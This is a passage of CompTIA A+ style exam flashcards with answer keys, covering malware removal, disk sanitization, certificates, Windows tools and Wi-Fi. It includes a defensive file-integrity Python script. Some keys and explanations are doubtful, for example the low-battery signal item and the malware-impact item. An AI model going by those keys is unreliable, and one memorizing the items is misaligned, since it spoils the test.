Changing the default administrator account: default accounts have practical limitations and consequently are the ultimate target for threat actors. Any use of the default administrator account must be logged and accounted for.

Disabling guest accounts: a guest account allows unauthorized access to the computer and may provide some sort of network access too. It should only be enabled to facilitate password-less file sharing in a Windows workgroup.

Restricting login times is typically used to prevent an account from logging in at an unusual time of the day or night or during the weekend.

189
Q

A developer, working at Microsoft, is helping to develop the latest and greatest user interface for Windows. The developer is assigned to the team that works on the user interface’s top level. What will the developer be working on?

Device Manager

Shortcut icons

File Explorer

Desktop

A

Desktop

The top level of the user interface is the desktop displayed when Windows starts and the user logs on. Windows 11 makes several changes to the desktop style. Notably, it center-aligns the taskbar and introduces another design for the Start menu.

The desktop contains the Start menu, taskbar, and shortcut icons. These are all used to launch and switch between applications.

File management is a critical part of using a computer. Computer support professionals will often have to assist users with locating files in File Explorer.

Device Manager provides an advanced management console interface for managing system and peripheral devices.

190
Q

What method uses the process of immersing the device into a high-intensity magnetic field that leaves the object magnetically impartial?

Incinerating

Degaussing

Erasing/wiping

Certificate of destruction

A

Degaussing

Degaussing is when a hard disk is exposed to a powerful electromagnet that disrupts the magnetic pattern that stores the data on the disk surface.

Incinerating is when the disk is exposed to high heat to melt its components. This should be performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.

Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.

A certificate of destruction shows the make, model, and the serial number of each drive that was handled, plus the date of destruction and how it was destroyed.

191
Q

A pet store owner receives an email from their bank with a special financing offer. The owner clicks on the attachment, but it does not open. Later that day, when the owner returns to their computer, it is running very slowly and will not connect to the internet. By the time the IT consultant arrives, the computer has locked up. Which of the following is the best action for the IT consultant given the existing conditions?

Check the Wi-Fi connection.

Enable SMART.

Run CHKDSK.

Run an antivirus scan.

A

Run an antivirus scan.

The symptoms in this scenario are consistent with a malware infection, although there could be other causes. As such, running an antivirus scan is the appropriate first step.

CHKDSK is a command-line tool that checks for hard disk errors and can repair them. Problems with the hard disk could cause all of the listed symptoms except the loss of internet access. Moreover, CHKDSK takes a long time to run, so it would not be the best first step in this case.

SMART (Self-Monitoring, Analysis, and Reporting Technology) is a hard disk monitoring program. It is an alerting tool, not a diagnostic tool.

Disconnected Wi-Fi could explain the inability to access the internet, but nothing else in this scenario.

192
Q

Employees are expected to stay updated on skills and knowledge to cope with changing threat types. Which of the following covers this?

Recovery mode

Security-awareness training

Anti-malware

OS reinstallation

A

Security-awareness training

Security-awareness training is usually delivered to employees at all levels, including end-users, technical staff, and executives. The training includes anti-phishing, software firewalls, passwords, malware threats, and more.

Anti-malware is computer software used to avoid, identify, and eliminate malware. Anti-malware is like antivirus software but for more up-to-date malware.

Recovery mode is used for the step-by-step process of manual removal: disabling persistence mechanisms and reconfiguring the system to its secure baseline.

OS reinstallation is required when antivirus software is not able to recover data from infected files, and the user must complete a system restore.

193
Q

An employee uses a cryptographic contactless technique that allows access to a building. What is this technique?

Palmprint scanner

Alarm system

Badge reader

Magnetometer

A

Badge reader

Badge readers are a type of electronic lock that works with a hardware token rather than a PIN.

A magnetometer is a type of metal detector often deployed at airports and in public buildings to identify concealed weapons or other items.

Alarm systems are designed to detect intrusion into a building or home. Alarm systems include motion sensors, video surveillance, and lighting.

A palmprint scanner is a contactless type of camera-based scanner that uses visible and infrared light to record and validate the unique pattern of veins and other features in a person’s hand. Unlike facial recognition, the user must make an intentional gesture to authenticate.

194
Q

According to CompTIA’s seven-step best practices procedure for malware removal, which of the following correctly lists the first three steps?

1. Disable System Restore. 2. Quarantine infected systems. 3. Create a restore point.

1. Quarantine infected systems. 2. Update anti-malware software. 3. Disable System Restore.

1. Investigate and verify malware symptoms. 2. Quarantine infected systems. 3. Disable System Restore.

1. Update anti-malware software. 2. Disable System Restore. 3. Quarantine infected systems.

A

1. Investigate and verify malware symptoms. 2. Quarantine infected systems. 3. Disable System Restore.

In order to remedy the issue, the first few steps in the correct order are: 1. Investigate and verify malware symptoms, 2. Quarantine infected systems, 3. Disable System Restore.

Steps 1 and 2 are incorrect: Quarantine infected systems is step 2 and Update anti-malware software is step 4.

Steps 1 and 3 are incorrect: Disable System Restore is step 3 and Create a restore point is step 6.

All steps are incorrect: Update anti-malware software is step 4, Disable System Restore is step 3, and Quarantine infected systems is step 2.

195
Q

A penetration tester targeted top-level executives during a test by sending out phishing emails. They received their first shell when the first executive opened the attachment in the phishing email. Once the penetration tester connects to the executive’s computer, what command will tell them the location of where their shell landed?

ls

cp

pwd

mv

A

pwd

pwd “prints” the working directory, though “printing” will typically mean “display on the terminal,” unless stdout is redirected. The working directory is important because commands will default to the working directory without specifying a path.

ls lists the contents of a directory similar to dir at the Windows command prompt. Popular parameters include -l to display a detailed (long) list and -a to display all files, including hidden or system files.

The mv command is used to move files from one directory to another or rename a file.

cp is used to create a copy of files either in the same or different directory with the same or different name.

196
Q

A technician makes sure that there is no faulty electrical equipment that can pose a risk and places extinguishers nearby. What is this called?

Electrical fire safety

Equipment grounding

Proper power handling

Fuse

A

Electrical fire safety

Electrical fire safety ensures that equipment is properly stored and away from any flammable material and electrical wires do not start a fire.

Electrical equipment must be grounded. The power plug connects devices such as PCs and printers to the building ground.

Proper power handling is done with the correct training. PC power supply units can carry dangerously high levels of voltage. Disconnection of power should be done before repairing a PC.

An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.

197
Q

A server administrator has not used the command line in quite some time and is trying to remember what will help them with commands and how to use them. Which of the following should the administrator use?

winver

ipconfig

ping

/?

A

/?

The command prompt includes a rudimentary help system. If the administrator types help at the command prompt and then presses ENTER, a list of available commands is displayed. They can also display help on a particular command by using the /? switch.

The winver command reports version information. Users will often need to use this for support.

Used without switches, ipconfig displays the IP address, subnet mask, and default gateway (router) for all network adapters to which TCP/IP is bound.

The ping command utility is a command-line diagnostic tool used to test whether a host can communicate with another host on the same network or on a remote network.

198
Q

A company uses an element that reminds users when logging in to the company’s device of the current software version. What is this called?

Assigned users

Acceptable use policy

Knowledge base

Splash screen

A

Splash screen

The splash screen is a graphic design element consisting of a window containing an image, logo, and the current software version.

Knowledge base (KB) is a repository for articles that answer frequently asked questions (FAQs) and document common or significant troubleshooting scenarios and examples. Each inventory record could be tagged with a cross-reference to an internal knowledge base to implement self-service support and assist technicians.

Assigned users are when hardware assets such as workstations, laptops, smartphones, tablets, and software licenses might be assigned to individual user accounts.

Acceptable use policy (AUP) sets out what someone can use a particular service or resource for.

199
Q

An administrator automates the creation of folders during a Windows install process. Which command should they use in their script?

rmdir

dir

cd

md

A

md

To create a directory, use the MD command. For example, to create a directory called Data in the current directory, type MD Data.

To delete an empty directory, enter rd Directory or rmdir Directory. If the directory is not empty, users can remove its files and subdirectories as well by using the /s switch.

The cd command sets the focus to a different working directory. Users can change to any directory by entering the full path.

Use the dir command to list the files and subdirectories from the working drive and directory or a specified path.

200
Q

A manager for a large corporation is in charge of client machines and is currently undergoing a lifecycle hardware refresh. They want to optimize the machines to be powerful enough to run applications. The manager also wants to be sure that they are not underpowered either. What can the manager use to determine CPU optimization?

User time

Pages/sec

Disk queue length

Privileged time

A

Privileged time

If privileged time is much higher than user time, the central processing unit (CPU) is likely underpowered (it can barely run Windows core processes efficiently).

If overall processor time is very high (over 85% for sustained periods), it can be helpful to compare these. Privileged time represents system processes, whereas user time is software applications.

If the disk queue length increases and disk time is high, then the manager has a disk problem.

Pages per second are the number of pages read from or written to disk to resolve hard page faults, which means memory moves processes to the page file.

201
Q

A low battery charge can cause several different problems to occur on a mobile device. Which of the following issues could stem from a low battery? (Select all that apply.)


Weak Bluetooth signal

Autorotation stops

Weak Wi-Fi signal

Lockout

A

Weak Bluetooth signal
Weak Wi-Fi signal

Searching for wireless signals, such as Wi-Fi, consumes a lot of battery power, so if the device’s battery is low, it may not have enough power to search for a strong signal.

Searching for wireless signals, such as Bluetooth, consumes a lot of battery power, so if the device’s battery is low, it may not have enough power to search for a strong signal.

A lockout occurs after a maximum number of failed sign-in attempts.

A low battery charge would not cause autorotation to stop. When a mobile device screen stops autorotating, either the rotation lock is enabled or there is a hardware issue.

202
Q

An administrator in charge of user endpoint images wants to slipstream and use image deployment. Which boot method would best support this?

Network

Internet

Optical

Internal hard drive

A

Network

Network boot setup means connecting to a shared folder containing the installation files, which could be slipstreamed or use image deployment.

A computer that supports network boot could also be configured to boot to setup over the internet. To set that up, the local network’s DHCP server must be configured to supply the DNS name of the installation server.

Historically, most attended installations and upgrades were run by booting from optical media (CD-ROM or DVD).

Once the OS has been installed, the administrator will usually want to set the internal hard drive as the default (highest priority) boot device and disable any other boot devices.

203
Q

A server administrator hears weekly about companies breached by malware. What is the most significant impact the server administrator is likely worried about?

Licensing

Training

Applications

Support

A

Applications

When selecting applications for installation on desktops, proper security considerations need to be made regarding potential impacts to the device (computer) and the network.

With support, the software might be available with paid-for support to obtain updates, monitor and fix security issues, and provide technical assistance.

With training, complex apps can have a substantial and expensive user-training requirement which can be an ongoing cost as new versions can introduce interface or feature changes.

With licensing, commercial software must be used within the constraints of its license, which is likely to restrict the number of devices on which the software can be installed.

204
Q

What type of encryption does WPA2 use? (Select all that apply.)


AES

WPA3

TKIP

MFA

A

AES
TKIP

Advanced encryption standard (AES) is the standard encryption used by WPA2 and the strongest encryption standard to use by Wi-Fi.

Temporal key integrity protocol (TKIP) tries to mitigate the various attacks against WEP developed by producing a new 128-bit encryption key for every packet sent on the network.

Wi-Fi Protected Access 3 (WPA3) uses passphrase-based group authentication of stations in private mode, and it changes the method by which this secret is used to agree session keys. The simultaneous authentication of equals (SAE) protocol replaces the 4-way handshake.

Multifactor authentication (MFA) allows the machine to establish a trust relationship and create a secure tunnel to transmit the user credentials or perform smart card authentication without a user password.

205
Q

A user logs into a computer and uses a camera that records a 3-D image with its infrared sensor to mitigate attempts to use a photo to spoof the authentication mechanism. What is this called?

Gpupdate

Facial recognition

Fingerprint

SSO

A

Facial recognition

Facial recognition is the bio gesture that uses a webcam to scan the unique features of the user’s face.

A fingerprint is the type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.

Single sign-on (SSO) means that a user authenticates once to a device or network to access multiple applications or services. The advantage of SSO is that each user does not have to manage multiple digital identities and passwords.

Group Policy is applied at sign-in and refreshed periodically, normally every 90 minutes. The gpupdate command is used to immediately apply a new or changed policy to a computer and account profile.

206
Q

A user needs to install a desktop application and use an application store that is reputable. What type of vendor is this store?

Untrusted source

Trusted source

Secure connection

Browser sign-in

A

Trusted source

A trusted source is a reputable vendor or an app store whose packages are checked and digitally signed. As the browser is a security-critical type of software, it is particularly important to obtain it from a trusted source; likewise, when installing any desktop application, the user should verify the publisher's signature on the installer rather than trusting the download site alone.

An untrusted source is one whose installer cannot be verified through a digital signature, or that has a history of bundling adware or other unwanted software and is therefore likely to expose the user to unwanted adverts.

A secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.

Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.

207
Q

What technique is often used to exhibit fake antivirus and security warnings or other malicious advertising?

Private browsing mode

Untrusted source

Trusted source

Pop-ups

A

Pop-ups

Pop-ups can be used by malicious actors to scare a user with fake antivirus or security warnings.

An untrusted source is one whose installer cannot be verified through a digital signature, or that has a history of bundling adware; software from such a source may itself generate pop-ups or disable the browser's pop-up blocker.

As the browser is a security-critical type of software, it is particularly important to obtain it from a trusted source, such as an app store or the vendor's own site. Keeping the browser's built-in pop-up blocker enabled closes most scare-ware pop-ups, and a genuine antivirus alert never arrives as a web page.

Private browsing mode disables the caching features of the browser so that no cookies, browsing history, form fields, passwords, or temp files will be stored when the session is closed.

208
Q

A network administrator troubleshoots domain name system (DNS) issues that a particular user is having. Which of the following utilities will help the administrator troubleshoot DNS specifically?

tracert

pathping

gpupdate

nslookup

A

nslookup

If the administrator identifies or suspects a problem with name resolution, they can troubleshoot DNS with the nslookup command, either interactively (a prompt at which successive queries can be typed) or non-interactively by passing the name, and optionally the server to query, on one command line. Querying a known-good public resolver as well as the configured one quickly shows whether the fault lies with the client's DNS server.

The gpupdate command is used to immediately apply a new or changed policy to a computer and account profile.

The tracert command-line utility is used to trace the path a packet of information takes to get to its target.

As an alternative to tracert, the pathping command performs a trace and then pings each hop router a given number of times for a given period.

209
Q

A telltale sign of a malware infection is when changes occur to system files. Which of the following is likely the result of malware-induced changes to system files? (Select all that apply.)

SELECT ALL THAT APPLY

Known-good files with expired certificates

Files that are missing or renamed

Additional files with names similar to authentic system files, such as scvhost.docx or ta5kmgr.xlsx

Files with date stamps and file sizes that are different from known-good versions

A

Files that are missing or renamed
Files with date stamps and file sizes that are different from known-good versions

System files are an attractive target for malware because renaming or deleting them can wreak havoc on the operating system, and replacing them lets malicious code run with the trust and privileges of the original.

Malware that patches or replaces a system file changes its size and hash. Attackers may also reset the modification date to that of the original (timestomping) to cover their tracks, so file dates should be compared against a known-good baseline rather than trusted on their own.

Malware does add files with names almost the same as authentic system files, but the extensions .docx and .xlsx represent Word and Excel documents, respectively. These are data files, not system files; system files have extensions such as .exe, .dll and .sys, so look-alike names matter when they carry an executable extension (scvhost.exe, not scvhost.docx).

An expired certificate is not an indicator here. Windows system files are digitally signed, and a known-good file whose signing certificate has since expired still verifies, because the signature is timestamped. What would indicate tampering is a file that fails signature verification (sigverif or Get-AuthenticodeSignature), not an expired certificate on a file whose hash matches the known-good version.
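The checks above (missing files, changed size or hash, a timestamp that no longer matches the content, and executables with near-miss names) can be automated against a baseline. The script below is an added example written for this page, not part of the flashcard set or any CompTIA material; it builds its own baseline in a temporary directory and tampers with it the way malware would, and the list of "known good" names is a constructed stand-in for a real System32 inventory.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Constructed list of genuine system binaries; a real baseline would cover all of System32.
KNOWN_GOOD = {"svchost.exe", "taskmgr.exe", "lsass.exe"}
EXEC_EXTS = {".exe", ".dll", ".sys"}


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Snapshot size, SHA-256 and modification time of every file under root."""
    out = {}
    for p in sorted(root.iterdir()):
        if p.is_file():
            st = p.stat()
            out[p.name] = {"size": st.st_size, "sha256": sha256_of(p), "mtime_ns": st.st_mtime_ns}
    return out


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertions, deletions, substitutions and
    swaps of adjacent characters each cost 1 (scvhost vs svchost is 1, as is ta5kmgr vs taskmgr)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def compare(root: Path, baseline: dict) -> dict:
    """Report files that vanished, changed content, changed content but kept the old
    timestamp (timestomping), or are executables whose names mimic known ones."""
    findings = {"missing": [], "modified": [], "timestomped": [], "lookalike": []}
    current = {p.name: p for p in root.iterdir() if p.is_file()}
    for name, rec in baseline.items():
        p = current.get(name)
        if p is None:
            findings["missing"].append(name)
            continue
        st = p.stat()
        if st.st_size != rec["size"] or sha256_of(p) != rec["sha256"]:
            findings["modified"].append(name)
            if st.st_mtime_ns == rec["mtime_ns"]:
                findings["timestomped"].append(name)
    known_stems = {os.path.splitext(n)[0] for n in KNOWN_GOOD}
    for name in current:
        if name in baseline:
            continue
        stem, ext = os.path.splitext(name.lower())
        # A near-miss name on a data file (.docx, .xlsx) is not a system file;
        # only executable extensions count.
        if ext in EXEC_EXTS and any(edit_distance(stem, g) == 1 for g in known_stems):
            findings["lookalike"].append(name)
    return {k: sorted(v) for k, v in findings.items()}


def demo() -> dict:
    """Constructed scenario: baseline three files, then tamper the way malware would."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name in KNOWN_GOOD:
            (root / name).write_bytes(b"MZ" + name.encode())
        baseline = build_baseline(root)

        victim = root / "taskmgr.exe"
        st = victim.stat()
        with victim.open("ab") as f:                       # patch the binary...
            f.write(b"\x90" * 16)
        os.utime(victim, ns=(st.st_atime_ns, st.st_mtime_ns))  # ...and reset its timestamp
        (root / "lsass.exe").unlink()                      # delete a system file
        (root / "scvhost.exe").write_bytes(b"MZ\x00")      # look-alike executable
        (root / "ta5kmgr.xlsx").write_bytes(b"PK\x03\x04")  # look-alike name, but a data file
        return compare(root, baseline)


if __name__ == "__main__":
    print(demo())
```

The timestomped entry is the interesting one: the file's date agrees with the baseline but its hash does not, which is exactly the case a date-only comparison would miss. On a real system the baseline would be taken from a clean build or from the hashes of the vendor's signed files, never from the machine under suspicion.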

210
Q

A user’s phone begins to act strangely, with apps responding slowly and pop-up ads appearing frequently. When the user calls the help desk and explains the issues, the technician says it sounds like malware. What other symptoms would be common to a malware infection on a mobile phone? (Select all that apply.)

SELECT ALL THAT APPLY

Increased Response Times

Fake security warnings

Redirection

APK sideloading

A

Fake security warnings
Redirection

Fake security warnings are a common symptom of malware infection. Scareware uses these to persuade users to install an app or give a Trojan app additional permissions.

Redirection attacks are a common symptom, where malware corrupts the Domain Name System (DNS) and search provider to force users to spoofed sites. This might disrupt access to legitimate sites, generate certificate warnings, and cause slow network performance.

APK (Android Package) sideloading refers to installing apps on Android phones from a source other than Google's Play store. It is a common route by which malware arrives, not a symptom of infection.

A lockout occurs after a maximum number of failed sign-in attempts.

211
Q

What technique is used on hard drives that reset them to factory condition and the hard drives only contain the information necessary to interact with a file system?

Erasing/wiping

Certificate of destruction

Low-level formatting

Third-party vendor

A

Low-level formatting

A low-level formatting tool resets a disk to its factory condition. Most of these tools now incorporate a sanitize function. Secure Erase (SE), an ATA command that makes the drive's own firmware erase every block, including ones the host cannot address, and Instant Secure Erase (ISE), which destroys the media encryption key of a self-encrypting drive so that the stored ciphertext becomes unreadable, are two such functions.

Third-party vendors may use overwriting or crypto-erase and issue a certificate of recycling rather than destruction.

A certificate of destruction shows the make, model, and the serial number of each drive that was handled, plus the date of destruction and how it was destroyed.

Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.

212
Q

An IT specialist found a damaging package on a client’s computer disguised as something else. What did the specialist find?

Spyware

Virus

Trojan

Boot sector virus

A

Trojan

Trojans are malware concealed within an installer package for software that appears to be legitimate.

Viruses are concealed within the code of an executable process image stored as a file on a disk.

Boot sector viruses can infect the boot sector code or partition table on a disk drive. When the disk is attached to a computer, the virus hijacks the bootloader process to load itself into memory.

Spyware is malware that can perform browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and more.

213
Q

The IT department determines that the phone belonging to the company’s vice president suffers a compromise and that the personal and corporate data contained on the phone has leaked. Which of the following should the IT team do next?

Wipe the phone.

Quarantine all devices that could be connected to the leak.

Reboot the phone.

Run an antivirus scan.

A

Quarantine all devices that could be connected to the leak.

If any personal or corporate data is leaked from a mobile device, each device that could have been a source for the files must be quarantined and investigated as a possible source of the breach.

Rebooting a phone generally solves an unresponsive or frozen system, malfunctioning app, or slow performance.

An antivirus scan would not be the next step in this scenario, as quarantining and investigating the source of the breach is the priority; a scan run before evidence is preserved may also alter or remove artifacts the investigation needs.

Wiping the phone will remove all data from the device, which is counterproductive to investigating the source of the breach.

214
Q

A digital forensics expert investigates a laptop that was not completely powered down. They are looking for a hibernation file on the local hard drive. Which power mode would perform this?

Modern standby

Hibernate

Standby

Hybrid sleep

A

Hibernate

Hibernate mode suspends to disk. It writes the contents of memory (including any open but unsaved file data) to hiberfil.sys in the root of the boot volume and then turns the computer off; this is ACPI state S4. Because the file is a memory image, it can hold passwords, keys and other artifacts and is therefore a valuable target for forensic analysis.

In hybrid sleep, the computer creates the hibernation file and then enters standby, so it can resume quickly from RAM but can still recover from disk if power is lost.

Modern standby utilizes a device’s ability to function in an S0 low-power idle mode to maintain network connectivity without consuming too much energy.

Standby suspends to RAM, which cuts power to most devices but maintains power to the memory, also called ACPI modes S1–S3.

215
Q

A technician sets up a company’s network and uses a method that lets employees know which network is the company’s network. What is this called?

UPnP

SSID

DHCP reservation

Firmware updates

A

SSID

The service set ID (SSID) is a simple, case-sensitive name by which users identify a WLAN. The factory configuration uses a default SSID, typically based on the device brand or model, which should be changed so that users recognize the company's network and so the access point's make and model are not advertised to anyone nearby.

The Universal Plug-and-Play (UPnP) framework lets applications send instructions to the firewall to open the ports they need. Because it allows any program on the LAN to expose services, it is usually disabled on the WAN side.

A Dynamic Host Configuration Protocol (DHCP) reservation means that the DHCP server always assigns the same IP address to a given host (identified by its MAC address). The administrator can usually choose which address this should be.

Firmware updates are important because they fix security holes and add support for the latest security standards.

216
Q

A server administrator reviews which file systems Linux supports. Which of the following are supported natively by Linux? (Select all that apply.)

SELECT ALL THAT APPLY

APFS

NTFS

ext4

FAT32

A

ext4
FAT32

Most Linux distributions use some version of the extended (ext) file system. ext4 delivers better performance than ext3 and would usually represent the best choice for new systems.

Linux can also read and write FAT/FAT32 (the VFAT driver). Network protocols such as the Network File System (NFS) can additionally mount remote storage into the local file system tree.

Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac workstations and laptops use the proprietary Apple File System (APFS).

The New Technology File System (NTFS) is a proprietary file system developed by Microsoft for use with Windows. Note that Linux distributions can in practice mount NTFS volumes through the ntfs-3g FUSE driver or the in-kernel ntfs3 driver; the exam's answer refers to file systems that Linux uses natively.

217
Q

A security analyst notices a critical incident that has a widespread effect on customers and could develop into a data breach. The analyst creates a ticket with the vendor and sets its importance in order to trigger a faster response time. Which attribute of the ticket did the analyst set?

Categories

Severity levels

Escalation levels

Problem resolution

A

Severity levels

The severity level is a way of classifying tickets into priority order. Severity schemes should be kept simple; a typical one has three levels based on impact: critical incidents, major incidents, and minor incidents.

Categories and subcategories group related tickets together, useful for assigning tickets to the relevant support section or technician and for reporting and analysis.

Escalation levels occur when an agent cannot resolve the ticket. The support team can be organized into tiers to clarify escalation levels.

Problem resolution sets out the plan of action and documents the successful implementation and testing of the plan and full system functionality.

218
Q

An employee is working with a substance that can potentially harm them. Which of the following should they use? (Select all that apply.)

SELECT ALL THAT APPLY

Air filter mask

Safety goggles

Fuse

Lifting techniques

A

Air filter mask
Safety goggles

Safety goggles are used to minimize the risk of burns from corrosive materials such as broken batteries, cellphones, tablets, or irritation from particles such as toner or dust.

An air filter mask that fits over the mouth and nose is a recommended face covering when working with compressed air, toner spills, or working in a dusty environment. An air filter mask will not protect the eyes.

Lifting techniques are included in safety handbooks; the guidance sets out to show employees lifting heavy objects incorrectly can cause muscle strains, back injuries, and damage the object.

An electrical device has a fuse rated for its maximum current. If the current rises past the fuse's rating, the fuse blows and cuts the circuit. A fuse rated too low blows too easily; one rated too high may not blow when it should. Neither is personal protective equipment.

219
Q

The IT Department has learned that a new employee starts on Monday and will need a computer just before the weekend. There is a used PC in the storeroom. A “ no operating system found “ message appears when the computer is rebooted after a technician installs Windows 10 on the computer with the hard drive partition style set to support Unified Extensible Firmware Interface (UEFI). Determine which of the following scenarios would generate that message.

Faulty motherboard

Application crash

Damaged hard drive

Corrupted MBR

A

Damaged hard drive

The hard drive stores the files for the operating system, so a damaged hard drive will generate the “no operating system found” message.

Applications do not load until after login, and the operating system would have to be found to load and display a login screen.

It is unlikely that a faulty motherboard would lead to a “no operating system found” error. It is more likely to cause the system not to boot, not recognize peripherals, or suffer the blue screen of death (BSOD).

Unified Extensible Firmware Interface (UEFI) generally does not interact with the Master Boot Record (MBR). The MBR is part of the legacy BIOS boot process.

220
Q

A user disables some of the laptops’ services, thinking it would speed up performance. After restarting the laptop, “One or more services failed to start” appears. When the IT specialist opens the Services snap-in, they identify the failed service and restart it, but that does not fix it. Which of the following scenarios best explains why the restart did not work?

The failed service was set to delayed start.

The IT specialist should have restored the failed service instead of restarting.

The user disabled a dependent service.

The failed service was deleted.

A

The user disabled a dependent service.

Most Windows services depend on other services to run. If the user disabled a service that the failed service depends on, it will fail to start; the Dependencies tab of the service's Properties dialog lists these, and the System event log records which dependency could not be started.

Service is restored if it is missing or has been deleted. The failed service still exists but failed to start due to disabled dependency.

Setting a service to delayed start is a way to improve Windows boot time since these services will not start until all other services are loaded. This setting will not cause a service to fail.

If the failed service were deleted, it would not have appeared as a service that failed to start.

221
Q

While conducting an online search for cleaning services, a homeowner clicks on the link for one of the results. When the website loads, the page says, “Warning: Potential Security Risk Ahead.” What would cause this message to appear? (Select all that apply.)

SELECT ALL THAT APPLY

The certificate is issued by an untrusted CA.

Malware is trying to redirect the browser to a spoofed page.

The certificate has expired.

The cleaning service is no longer in business.

A

The certificate is issued by an untrusted CA.
Malware is trying to redirect the browser to a spoofed page.

If a certificate was issued by a Certificate Authority (CA) that the browser does not trust, the padlock icon is replaced by a warning icon, the URL may be displayed with strikethrough formatting, and the site content is blocked behind a warning page.

If a certificate has expired, the site content is likewise blocked behind a warning page. This card's answer key omits expiry, but the following card correctly counts an expired certificate among the invalid certificates that produce this warning.

A warning message could also indicate that malware on the computer is attempting to redirect the browser to a spoofed page: the spoofed server presents a certificate whose name does not match the requested host, or one that no trusted CA issued.

Even if the cleaning service went out of business and shut down their website, it would not generate a security message.

222
Q

Which of the following scenarios would result in a website having an untrusted or invalid certificate? (Select all that apply.)

SELECT ALL THAT APPLY

The certificate is issued by a trusted CA.

The certificate is revoked.

The certificate is self-signed.

The certificate has expired.

A

The certificate is revoked.
The certificate is self-signed.
The certificate has expired.

Certificate warnings occur when a certificate is untrusted, such as a self-signed certificate: the padlock icon is replaced by an alert icon, the URL is displayed with strikethrough formatting, and the site content is likely to be blocked by a warning message.

Certificate warnings also occur with an invalid certificate, such as one that has expired (or one that is not yet valid, which usually means the client's clock is wrong).

Certificate warnings occur when a certificate has been revoked. Revocation is performed by the issuing CA before the expiry date, typically because the private key was compromised or the certificate was issued in error; browsers check for it through CRLs or OCSP. An attacker who stole a site's private key could present its certificate from a spoofed server, which is exactly the case revocation exists to catch.

A certificate issued by a trusted Certificate Authority (CA), and otherwise valid for the host name, does not trigger a warning.

223
Q

Two friends want to share photos with each other from their iPhones. The first friend selects their photos and uses AirDrop to share with the second friend. However, the first friend gets a message that there is no one nearby to share with. Why would that message appear?

The second friend has Wi-Fi disabled.

The second friend has Bluetooth disabled.

The first friend has Nearby Share disabled.

The first friend has Bluetooth disabled.

A

The second friend has Bluetooth disabled.

AirDrop is an Apple feature that transfers files between nearby iOS, iPadOS and macOS devices. It uses Bluetooth to discover nearby devices and negotiate the session, so if the second friend has Bluetooth disabled, the first friend's iPhone cannot discover it and reports that no one is nearby.

The exam's model answer treats Wi-Fi as irrelevant, but in practice AirDrop needs both radios: Bluetooth for discovery and a peer-to-peer Wi-Fi link for the actual transfer, so Wi-Fi being off on either device also stops sharing.

Nearby Share is the Android equivalent of AirDrop and has no bearing on two iPhones.

If the first friend had Bluetooth disabled, they would be alerted to turn Bluetooth on before sharing files.

224
Q

An employee needs to ensure that the customer receives a professional support delivery. Which of the following does this include? (Select all that apply.)

SELECT ALL THAT APPLY

Provide proper documentation.

Deal appropriately with confidential and private materials.

Be on time.

Take routine personal phone calls

A

Provide proper documentation.
Deal appropriately with confidential and private materials.
Be on time.

The employee should be on time for each in-person appointment. If running late, call the customer as soon as possible to let them know.

A distraction is anything that interrupts an employee from the task of resolving the ticket. Avoid any personal calls while helping the customer.

Deal appropriately with confidential and private materials, showing the customer that privacy is respected by not opening files, emails, contacts, or web pages.

Proper documentation should be provided so that the customer knows what to expect in terms of supported items, how long incidents may take to resolve, and so on.

225
Q

When a project team is constructing a change request document, a part that needs to be included is the number of devices, users, or customers that will be affected by the change. What is this part of the document?

End-user acceptance

Scope of the change

Purpose of the change

Rollback plan

A

Scope of the change

The scope of the change may include cost, timescales, and the number of devices, users or customers involved. The scope should also include the criteria by which the success or failure of the change will be judged.

The purpose of the change is the business case for making it and the benefits expected.

End-user acceptance must be accounted for when a change is implemented. It can be difficult for people to adapt to new processes and easy for them to magnify minor problems into major complaints.

A rollback plan describes how the change can be reversed if it has harmful or unforeseen consequences.

226
Q

Advanced malware infection may require manual removal. Which of the following tools assists in manual malware removal? (Select all that apply.)

SELECT ALL THAT APPLY

WinPE

regedit

cleanmgr

msconfig

A

WinPE
regedit
msconfig

The Registry Editor (regedit) is a tool for making direct edits to the registry database, such as manually removing registry items.

The System Configuration Utility (msconfig) can be used to perform a safe boot to prevent any infected code from running at startup.

The Windows Preinstallation Environment (WinPE) can be used to run commands from a clean command environment after booting the computer with a recovery disc.

Disk Clean-up (cleanmgr) is a Windows utility tool that tracks files that can be safely erased, such as temporary files, to reclaim disk space.

227
Q

A server administrator was hired at a startup company. The administrator has not established any services yet, but wants to set up basic domain services such as Active Directory, email, and domain name system (DNS). Which client operating systems will be compatible with domain-joined networks? (Select all that apply.)

SELECT ALL THAT APPLY

Pro

Enterprise

Home

Education

A

Pro
Enterprise
Education

The principal feature distinguishing the Pro, Enterprise, and Education editions from Home is the ability to join a domain network (and so to be managed through Group Policy).

The Enterprise edition can also join a domain network. Windows Enterprise has the full feature set but is only available via volume licensing.

The Education edition can also join a domain network. Windows Education/Pro Education are variants of the Enterprise and Pro editions designed for licensing by schools and colleges.

Home is the only edition that cannot join a domain network. The Windows Home edition is designed for domestic consumers and possibly small office home office (SOHO) business use.

228
Q

